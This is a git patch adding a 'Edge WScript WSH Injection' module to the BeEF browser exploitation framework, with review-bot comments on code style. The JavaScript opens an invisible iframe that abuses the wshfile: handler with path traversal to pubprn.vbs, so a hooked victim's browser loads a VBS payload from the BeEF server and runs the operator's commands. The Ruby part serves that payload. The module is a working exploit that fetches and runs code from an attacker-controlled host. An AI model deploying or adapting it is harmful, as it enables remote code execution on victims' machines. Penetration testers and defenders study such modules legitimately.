From c385b1a352e2d5527a882b0dc9ee2307974faee6 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sat, 30 Mar 2019 00:18:59 +0000
Subject: [PATCH] Add Edge WScript WSH Injection module
---
 .../edge_wscript_wsh_injection/command.js | 31 ++++++++++
 .../edge_wscript_wsh_injection/config.yaml | 20 +++++++
 .../edge_wscript_wsh_injection/module.rb | 60 +++++++++++++++++++
 3 files changed, 111 insertions(+)
 create mode 100755 modules/social_engineering/edge_wscript_wsh_injection/command.js
 create mode 100755 modules/social_engineering/edge_wscript_wsh_injection/config.yaml
 create mode 100755 modules/social_engineering/edge_wscript_wsh_injection/module.rb
diff --git a/modules/social_engineering/edge_wscript_wsh_injection/command.js b/modules/social_engineering/edge_wscript_wsh_injection/command.js
new file mode 100755
index 000000000..6d8c5e09b
--- /dev/null
+++ b/modules/social_engineering/edge_wscript_wsh_injection/command.js
@@ -0,0 +1,31 @@
+//
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function(){
+ var timeout = 5;
+
+ if (!beef.browser.isEdge()) {
+ beef.debug("[Edge WScript WSH Injection] Browser is not supported.");
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser is not supported', beef.are.status_error());
+ return;
+ }
+
+ try {
+ var wsh_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+ var beef_host = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port;
+ wsh_iframe_<%= @command_id %>.setAttribute('src', 'wshfile:test/../../../../../../../Windows/System32/Printing_Admin_Scripts/en-US/pubprn.vbs" 127.0.0.1 script:' + beef_host + '/<%= @command_id %>/index.html');
+ } catch (e) {
+ beef.debug("[Edge WScript WSH Injection] Could not create iframe");
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Could not create iframe', beef.are.status_error());
+ return;
+ }
+
+ // clean up
+ cleanup = function() {
+ document.body.removeChild(wsh_iframe_<%= @command_id %>);
+ }
+ setTimeout("cleanup()", timeout*1000);
+});
diff --git a/modules/social_engineering/edge_wscript_wsh_injection/config.yaml b/modules/social_engineering/edge_wscript_wsh_injection/config.yaml
new file mode 100755
index 000000000..1f68fa559
--- /dev/null
+++ b/modules/social_engineering/edge_wscript_wsh_injection/config.yaml
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ edge_wscript_wsh_injection:
+ enable: true
+ category: ["Social Engineering"]
+ name: "Edge WScript WSH Injection"
+ description: "Prompts the user to run \"Microsoft Windows Based Script Host\" (WScript.exe).
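Review bot: The cleanup at the end of the hunk assigns `cleanup` without `var`, creating an implicit global, and passes `setTimeout` a string to evaluate instead of a function reference; two instances of this command on the same page would overwrite each other's `cleanup`, and the string form is the discouraged eval path. A function literal keeps the closure over the iframe variable and drops the global: `setTimeout(function() { document.body.removeChild(wsh_iframe_<%= @command_id %>); }, timeout * 1000);`. Separately, only the two failure branches call `beef.net.send`; nothing is reported on the normal path, so the `@datastore['result']` that module.rb's `post_execute` saves is never populated from this script, which is worth a comment such as `// this command reports failures only; no result is sent on the normal path`.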

Uses wshfile protocol handler technique to load pubprn.vbs and WSH injection in pubprn.vbs to execute arbitrary code.

If the user allows execution, a VBS payload is downloaded from BeEF, and the specified commands are executed." + authors: [ + "@qab", # wshfile protocol handler + traversal technique, and exploit + "@enigma0x3", # pubprn.vbs technique and exploit + "bcoles" # BeEF + ] + target: + user_notify: ["E"] + not_working: ["ALL"] diff --git a/modules/social_engineering/edge_wscript_wsh_injection/module.rb b/modules/social_engineering/edge_wscript_wsh_injection/module.rb new file mode 100755 index 000000000..636bd1f7d --- /dev/null +++ b/modules/social_engineering/edge_wscript_wsh_injection/module.rb @@ -0,0 +1,60 @@ +# +# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Edge_wscript_wsh_injection < BeEF::Core::Command + + def pre_send + payload = '' + @datastore.each do |input| + if input['name'] == 'payload' + payload = input['value'] + end + end + + rand_str = rand(32**10).to_s(32) + + script = <<-EOF + + + + + + + + + +EOF + + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', + { + 'Content-Type' => 'text/html' + }, + script, + "/#{@command_id}/index.html", + -1 + ) + end + + def self.options + return [ + {'name' => 'payload', 'ui_label' => 'Commands', 'value' => "calc.exe"} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/#{@command_id}/index.html") + end +end
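Review bot: `rand_str` in `pre_send` is assigned from `rand(32**10).to_s(32)` and never used in the lines shown; the heredoc body between `<<-EOF` and `EOF` is not visible in this rendering, so if it does not interpolate `rand_str` the assignment should go. The lookup loop over `@datastore` reads more directly as a find, given that `self.options` declares a single `payload` input: `entry = @datastore.find { |i| i['name'] == 'payload' }` followed by `payload = entry ? entry['value'] : ''`. `post_execute` indexes `@datastore['result']` by key while `pre_send` iterates the same variable as a list of `name`/`value` hashes; presumably the framework hands the two hooks differently shaped data, and a one-line comment saying so would save the next reader a detour. `self.options` also uses an explicit `return` on a single-expression method, which the Ruby style guide discourages.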